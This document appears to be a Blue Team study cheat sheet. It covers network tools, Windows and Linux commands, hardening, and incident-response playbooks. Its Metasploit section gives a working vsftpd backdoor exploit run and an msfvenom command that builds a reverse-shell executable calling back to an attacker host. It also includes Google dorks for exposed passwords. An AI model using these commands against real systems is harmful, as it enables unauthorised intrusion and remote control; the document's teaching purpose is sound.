Networking Blue Team Tools

Networking / Blue Team Tools Overview

Theory

  • Blue Team focuses on defending networks, systems, and data from cyberattacks.

  • Tools are used for monitoring traffic, detecting intrusions, and logging network events.

  • Emphasis is on visibility, detection, and incident response.

Practical

  • Setup: Use a virtual lab with Kali Linux (Attacker), Ubuntu/Windows (Victim), and Security Onion (Monitoring).

  • Common Blue Team tools: Wireshark, tcpdump, Snort, Bro (Zeek), ARGUS, TShark, Scapy, etc.

Common Ports

Theory

  • Common ports:

    • 20/21 (FTP), 22 (SSH), 23 (Telnet), 25 (SMTP), 53 (DNS), 80 (HTTP), 110 (POP3), 443 (HTTPS), 445 (SMB), 3389 (RDP)

  • TCP vs UDP: TCP is connection-oriented; UDP is faster but unreliable.

Practical

sudo netstat -tulnp    # List listening ports
sudo lsof -i           # Show open ports
nmap -sT localhost     # Scan local machine ports

IPv4 / TCP / UDP / ICMP Headers, Subnetting

Theory

  • IPv4 Header: Version, IHL, Type of Service, Total Length, etc.

  • TCP Header: Source port, Destination port, Flags (SYN, ACK, etc.)

  • UDP Header: Simpler, with Source/Dest Port, Length, Checksum

  • ICMP: Echo request/reply (used in ping)

  • Subnetting: Divides networks; use CIDR notation (e.g., 192.168.1.0/24)

Practical

Use Wireshark to inspect TCP/UDP headers.

ping -c 3 8.8.8.8
ipcalc 192.168.1.0/24

IPv6 / TCP Header

Theory

  • IPv6: 128-bit addresses, no NAT, simplified headers.

  • TCP header remains the same as in IPv4.

Practical

Use Wireshark or Scapy to craft/view IPv6 packets.
ping6 ipv6.google.com

OSI Model

Theory

  1. Physical

  2. Data Link

  3. Network

  4. Transport

  5. Session

  6. Presentation

  7. Application

TCP/IP maps to OSI (4 layers).

Practical

  • Use Wireshark to view data flowing through layers (e.g., Application layer: HTTP)

HTTP, FTP, Decimal to Hex Conversion

Theory

  • HTTP: Used for web, uses port 80.

  • FTP: Transfers files, ports 20/21.

  • Hex: Base-16, common in packet data.

Practical

Use Wireshark and analyze HTTP GET/POST headers.

curl http://example.com
ftp ftp.gnu.org
echo $((16#1F)) # Hex to decimal

20 Critical Security Controls

Theory

  • Developed by CIS (Center for Internet Security).

  • Includes controls like Inventory, Secure Configurations, Logging, Email Protection, etc.

Practical

  • Use OpenVAS/Nessus to assess systems.

  • Use auditd or OSSEC to implement monitoring controls.

Cisco Networking All in One Reference

Theory

  • Includes Switching, Routing, VLANs, ACLs, NAT, VPNs, etc.

  • Cisco IOS basics: show ip int brief, conf t, int g0/1, etc.

Practical

Use Cisco Packet Tracer:

  • Configure VLANs, ACLs

  • Setup routing with OSPF or EIGRP

conf t
interface g0/1
ip address 192.168.1.1 255.255.255.0
no shut

Misc Tools / Cheat Sheets

Theory

  • Misc tools refer to a wide variety of utilities used for reconnaissance, enumeration, exploitation, and troubleshooting.

  • Cheat sheets summarize syntax, options, and commands for rapid use — great for high-pressure situations like CTFs or incident response.

Common Cheat Sheets:

Practical Tips:

  • Keep cheat sheets in markdown or PDF in your lab.

  • Use tools like tldr (a simplified man page tool) or create aliases:

tldr curl
alias grabip="ip addr | grep inet"

ARGUS / TCPDUMP / TSHARK / NGREP

Theory

  • ARGUS: Real-time traffic flow monitoring.

  • tcpdump: Command-line packet capture.

  • tshark: Wireshark CLI.

  • ngrep: grep-like tool for network traffic.

Practical

tcpdump -i eth0 port 80
tshark -i eth0 -Y "http.request"
ngrep -d eth0 "password" port 80

Tcpdump

Theory

  • Captures raw packets from interface.

  • Filters with BPF syntax.

Practical

sudo tcpdump -i eth0 -nn -X
sudo tcpdump -i eth0 'tcp[tcpflags] & tcp-syn != 0'

Berkeley Packet Filters and Bit Masking

Theory

  • BPF is used in tools like tcpdump.

  • Syntax allows granular filtering using logic and masks.

Practical

tcpdump 'ip[6:2] & 0x1fff = 0' # Filter non-fragmented packets

Wireshark

Theory

  • GUI tool for packet analysis.

  • Filters: http.request, ip.addr == 192.168.1.1

Practical

  • Capture traffic.

  • Analyze TCP streams.

  • Use coloring rules and protocol hierarchies.

Nmap

Theory

  • Port scanner and host discovery tool.

  • Supports OS detection, versioning, script scanning.

Practical

nmap -sS -A 192.168.1.1
nmap --script vuln 192.168.1.1

Google Hacking (Google Dorking)

Theory

  • Uses special search operators to find vulnerable information indexed by Google.

  • Common operators:

    • intitle:, inurl:, filetype:, site:, cache:, intext:

  • Used to find login pages, error messages, exposed documents, etc.

Examples

plaintext
intitle:"index of" inurl:ftp
filetype:sql "password"
site:gov filetype:pdf
inurl:admin login

Practical

  • Use Google safely — avoid targeting without permission.

  • Combine with theHarvester for automated data collection.

Python Quick Reference

Theory

  • Used for scripting analysis tools and automation.

Practical

import socket
print(socket.gethostbyname('google.com'))

Regular Expressions

Theory

  • Pattern matching, used in log parsing, packet inspection.

grep -E 'Failed password|Invalid user' /var/log/auth.log

Practical

In Python:

import re
re.findall(r'\d+\.\d+\.\d+\.\d+', 'Failed login from 192.168.1.1')

SNORT

Theory

  • Signature-based Intrusion Detection System.

Practical

Write a simple rule:

snort -i eth0 -c /etc/snort/snort.conf -A console
alert tcp any any -> any 80 (msg:"HTTP detected"; sid:1000001;)

rwfilter (SiLK)

Theory

  • Flow analysis tool from CERT NetSA suite.

Practical

rwfilter --start-date=2025/06/01 --type=in --proto=6 --pass=stdout | rwcut

Scapy

Theory

  • Python-based packet crafting tool.

Practical

from scapy.all import *
packet = IP(dst="1.1.1.1")/ICMP()
send(packet)

Bro (Zeek)

Theory

  • Network Security Monitor for traffic analysis and logging.

  • Powerful scripting engine.

Practical

zeek -r traffic.pcap
cat conn.log

Netcat

Theory

  • Called the Swiss Army Knife of networking.

  • Can be used for:

    • Port scanning

    • Banner grabbing

    • Reverse/backconnect shells

    • File transfer

    • TCP/UDP client/server

Practical

# Listen on port 4444
nc -lvnp 4444

# Connect to remote host
nc 192.168.1.10 4444

# Transfer file

# Sender
nc -lvnp 5555 < file.txt

# Receiver
nc 192.168.1.10 5555 > file.txt

# Banner grabbing
nc -nv 192.168.1.1 80
GET / HTTP/1.1

Hping

Theory

  • A network tool like ping but more customizable.

  • Can send custom TCP/UDP/ICMP packets.

  • Used for firewall testing, port scanning, DoS simulation, and traceroute.

Practical

# Basic ping (like ICMP ping)
hping3 -1 192.168.1.1

# TCP SYN scan on port 80
hping3 -S -p 80 192.168.1.1

# Traceroute-like scan
hping3 -S -p 80 --traceroute 192.168.1.1

# UDP Scan
hping3 --udp -p 53 -c 1 192.168.1.1

Metasploit Framework

Theory

  • Penetration testing framework with hundreds of exploits, payloads, and auxiliary modules.

  • Used for vulnerability verification, post-exploitation, payload delivery, and pivoting.

Components:

  • msfconsole: Main CLI interface.

  • Modules:

    • Exploit

    • Auxiliary

    • Payloads

    • Encoders

    • Post

msfconsole

# Search exploit
search vsftpd

# Use exploit
use exploit/unix/ftp/vsftpd_234_backdoor

# Set options
set RHOSTS 192.168.1.10
set LHOST 192.168.1.5
set PAYLOAD cmd/unix/interact
run

Practical

Other uses:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f exe > shell.exe

Optional Tools to Combine With:

ToolPurpose
theHarvesterEmail and subdomain enumeration
dnsenumDNS info gathering
Enum4linuxSMB info and share enum
NiktoWeb server vulnerability scanner
HydraBrute-force for SSH, FTP, HTTP etc.

WINDOWS SECTION

 


Useful Windows Commands, Reg, Netsh, Netstat, Loops

Theory

These commands are essential for administration, diagnostics, and security operations on Windows systems.

Practical

:: System Info & User Info
systeminfo
whoami
hostname

:: Registry Operations
reg query HKLM\Software
reg add HKCU\Software\Test /v Flag /t REG_SZ /d YES /f

:: Network Config & Firewall
netsh interface ipv4 show interfaces
netsh advfirewall firewall show rule name=all

:: Port and Connection Monitoring
netstat -ano
tasklist /fi "PID eq 1234"

:: For Loops in Batch
for /L %%G in (1,1,5) do echo %%G

Intrusion Detection Cheat Sheets

Theory

Used to recognize suspicious or malicious behaviors based on logs, memory, or network events. Good for SIEM and SOC analysts.

Common Cheat Sheets:

  • MITRE ATT&CK

  • Windows Log Event Cheat Sheet

  • Sysmon Event ID Reference

  • Sigma Rule Templates

Practical

Use them to write:

  • YARA rules

  • Sigma rules

  • Correlate events in ELK or Splunk:

index=winlogbeat EventID=4625

Windows Incident Response

Theory

Steps taken during or after a compromise to identify, contain, and eradicate malicious activity.

Practical

# 1. Identify current users & logon sessions
query user
whoami /groups

# 2. Review recent system and security logs
wevtutil qe Security "/q:*[System[(EventID=4624)]]" /f:text /c:5

# 3. Check for persistence mechanisms
dir "C:\Users\*\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
schtasks /query /fo LIST

# 4. Investigate network and running processes
netstat -ano
tasklist

Windows Security Log Event IDs

Theory

Security event logs reveal auth attempts, privilege use, process creation, etc.

Important Event IDs:

Event IDMeaning
4624Successful logon
4625Failed logon
4688New process created
4672Special privileges assigned
4648Logon with explicit credentials

Practical

Use Windows Event Viewer or PowerShell to parse logs:

Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4624} | Format-List

PowerShell

Theory

PowerShell is a powerful automation and post-exploitation tool used for both Blue and Red teams.

Practical

# List services
Get-Service

# List processes
Get-Process

# Remote session
Enter-PSSession -ComputerName 192.168.1.10

# Get users from AD (if in domain)
Get-ADUser -Filter *

# Script a loop
foreach ($i in 1..5) { Write-Host "Value: $i" }

LINUX / UNIX SECTION

 


Linux Hardening

Theory

Reducing attack surface and increasing auditing/monitoring.

Key Steps:

  • Disable unused services

  • Use strong file permissions

  • Configure auditd, fail2ban

  • Enforce password policies

  • Enable AppArmor/SELinux

Practical

systemctl disable telnet
chmod 700 ~/.ssh
ufw enable
chage -l username

Basic Linux Commands

Theory

Essential for administration, scripting, security.

Practical

ps aux # running processes
top / htop # interactive monitoring
df -h # disk usage
netstat -tuln # open ports
grep "error" /var/log/syslog

SSH Forwarding

Theory

Used for tunneling traffic securely.

Practical

# Local port forwarding
ssh -L 8080:internal.server:80 user@jumpbox

# Remote port forwarding
ssh -R 9000:localhost:22 user@remotehost

Iptables

Theory

Powerful packet filtering/firewall tool.

Practical

# Allow HTTP
iptables -A INPUT -p tcp --dport 80 -j ACCEPT

# Drop all other inbound
iptables -P INPUT DROP

# List rules
iptables -L -n -v

Searching Through Files

Theory

Find strings, patterns, or files for forensics or log parsing.

Practical

grep -i "error" /var/log/syslog
find / -name "*.log"
awk '{print $1,$5}' /var/log/syslog
cut -d':' -f2 /etc/passwd

Cron

Theory

Used for scheduling periodic tasks (including malware persistence!).

Practical

crontab -l
crontab -e
# Example: Run script every day at 5pm
0 17 * * * /home/user/backup.sh

VI Editor

Theory

A classic text editor available on almost all Unix systems.

Practical

vi file.txt
# i -> insert mode
# esc -> back to command
# :w -> write
# :q! -> quit without saving

REMnux / Reverse Engineer Malware


Theory

REMnux is a Linux distro for malware analysis.

Includes tools like:

  • Ghidra: Static code analysis

  • Radare2: Binary analysis

  • Volatility: Memory forensics

  • Cutter: GUI for radare2

  • ApkTool, PEStudio, etc.


Practical Steps

  1. Unpack Malware

upx -d malware.exe
  1. Check Strings

strings malware.exe | less
  1. Inspect with Static Analyzers

  • Run in Ghidra: Inspect functions and entry points.

  • Use peframe or exiftool for metadata.

  1. Dynamic Analysis

  • Run malware in REMnux + INetSim

  • Monitor behavior with Wireshark and Procmon (on Windows)

Incident Response / Playbook Per Situation

Theory

Incident Response (IR) involves a structured approach to handling security breaches:

  1. Preparation

  2. Identification

  3. Containment

  4. Eradication

  5. Recovery

  6. Lessons Learned

Playbooks are step-by-step response guides tailored to specific incident types.

Worm Infection Response

Theory

  • Worms spread automatically across systems/networks without human interaction.

  • Key signs: Unusual network traffic, sudden disk usage, CPU spikes, rapid spread.

Practical

  1. Identify infected hosts via logs:

  2. Containment: Isolate machine from the network.

  3. Eradication:

    • Scan with antivirus (Windows Defender, ClamAV)

    • Remove registry entries and startup scripts

  4. Recovery:

    • Patch OS

    • Reimage if needed

last | grep <suspicious user>
netstat -an | grep :135 # Look for SMB traffic

Windows Malware Detection

Theory

Look for indicators like:

  • Suspicious processes (e.g. svchost.exe in the wrong path)

  • Unknown startup entries

  • Unusual registry keys

Practical

Get-Process | Where-Object { $_.Path -notlike "C:\Windows\*" }

# Check autoruns
autoruns64.exe

# Scan with Windows Defender
Start-MpScan -ScanType FullScan

Windows Intrusion Detection

Theory

  • Detect via logs (Event Viewer), changes in services, and behavioral signs.

Practical

  • Use Sysmon + ELK for detailed tracking.

Get-WinEvent -LogName Security | Where-Object {$_.Id -eq 4625} # Failed logons

# Suspicious accounts
net user /domain

Website Defacement

Theory

  • Visual signs of tampering.

  • May be caused by:

    • SQL injection

    • RFI/LFI

    • Admin panel brute-force

Practical

  1. Identify via:

  2. Check logs:

  3. Contain:

    • Take down site if needed

    • Backup files

  4. Restore from backup + patch vulnerabilities

curl http://website.com
tail -f /var/log/apache2/access.log
tail -f /var/log/apache2/error.log

Linux/Unix Intrusion Detection

Theory

  • Look for new users, SUID binaries, netcat shells, or modified cron jobs.

Practical

  • Use auditd or AIDE for change detection.

# Check for new SUID binaries
find / -perm -4000 -type f 2>/dev/null

# Check for unknown users
cat /etc/passwd | tail

# Cron jobs
crontab -l

Malicious Network Behavior

Theory

  • Includes scanning, lateral movement, data exfiltration.

Practical

  • Use Wireshark, Zeek, Suricata, or tcpdump to monitor traffic:

  • Detect beaconing:

    • Repeated outbound connections at exact intervals

  • Correlate with:

    • DNS logs

    • Proxy logs

tcpdump -nn -i eth0 port not 22

DDoS Incident Response

Theory

DDoS = Distributed Denial of Service — floods service to make it unusable.

Practical

  1. Identify via:

    • Firewall logs

    • NetFlow/sFlow

    • Web server access logs

  2. Contain:

    • Geo-block or rate-limit using firewall/WAF:

  3. Eradicate:

    • Contact ISP/CDN (Cloudflare, Akamai)

  4. Recovery:

    • Implement DDoS protection mechanisms

iptables -A INPUT -s 1.2.3.4 -j DROP

Phishing Incident Response

Theory

  • Phishing = fraudulent email to steal credentials or deliver malware.

Practical

  1. Identify:

    • Forward email to analysis sandbox

    • Check header:

  2. Contain:

    • Revoke credentials

    • Remove malicious emails via Exchange Admin Center or PowerShell:

       
  3. Eradication:

    • Train users

    • Add domain to blacklist

cat email.eml | grep -i "Received"
Search-Mailbox -Identity user -SearchQuery "Subject:'Invoice'" -DeleteContent

Social Engineering Incident Response

Theory

Attacker manipulates people to gain unauthorized access.

Practical

  1. Interview staff involved.

  2. Review logs to verify what was accessed.

  3. Contain by resetting credentials.

  4. Notify security team and affected users.

  5. Launch awareness training.

Incident Response Forms

Theory

Standardized documents to record and communicate incidents:

  • Classification

  • Timeline

  • Systems impacted

  • Containment steps

  • Point of contact

Examples

  • IR Reporting Template (PDF or Word)

  • NIST 800-61 templates

  • Fields:

    • Description

    • Severity

    • Team involved

    • Remediation actions

Incident Communications Log

Theory

Chronological log of actions and communications for legal and audit purposes.

Practical

Create in Excel or Markdown:

markdown
| Time | Action Taken | By Whom |
|------------|---------------------------|-----------|
| 10:12 AM | Isolated host 192.168.1.10| Analyst 1 |
| 10:35 AM | Notified IT and HR | IR Lead |

Incident Contact List

Theory

Prepared list of individuals and teams to notify during IR.

Contents

  • SOC Analysts

  • IT admins

  • Legal counsel

  • PR/Comms team

  • CIRT lead

Incident Identification

Theory

Detect via:

  • Alerts (SIEM, IDS)

  • User-reported

  • Threat intel feeds

  • Unusual logs or system behavior

Practical

Use ELK stack or Splunk for real-time detection.

grep "Failed password" /var/log/auth.log

Incident Containment

Theory

Prevent further damage and isolate the threat.

Practical

  • Disable user accounts

  • Block attacker IPs

  • Isolate machines

ufw deny from 203.0.113.99
shutdown now

Incident Eradication

Theory

Remove malware and fix the root cause.

Practical

  • Reimage system or restore from backup

  • Remove persistence mechanisms (cron, registry)

  • Patch exploited vulnerabilities

Incident Survey (Post-Incident Review)

Theory

Conduct after-action review and lessons learned.

Practical

Answer:

  • What was missed?

  • What could be improved?

  • Were detection and containment timely?

  • Update documentation and training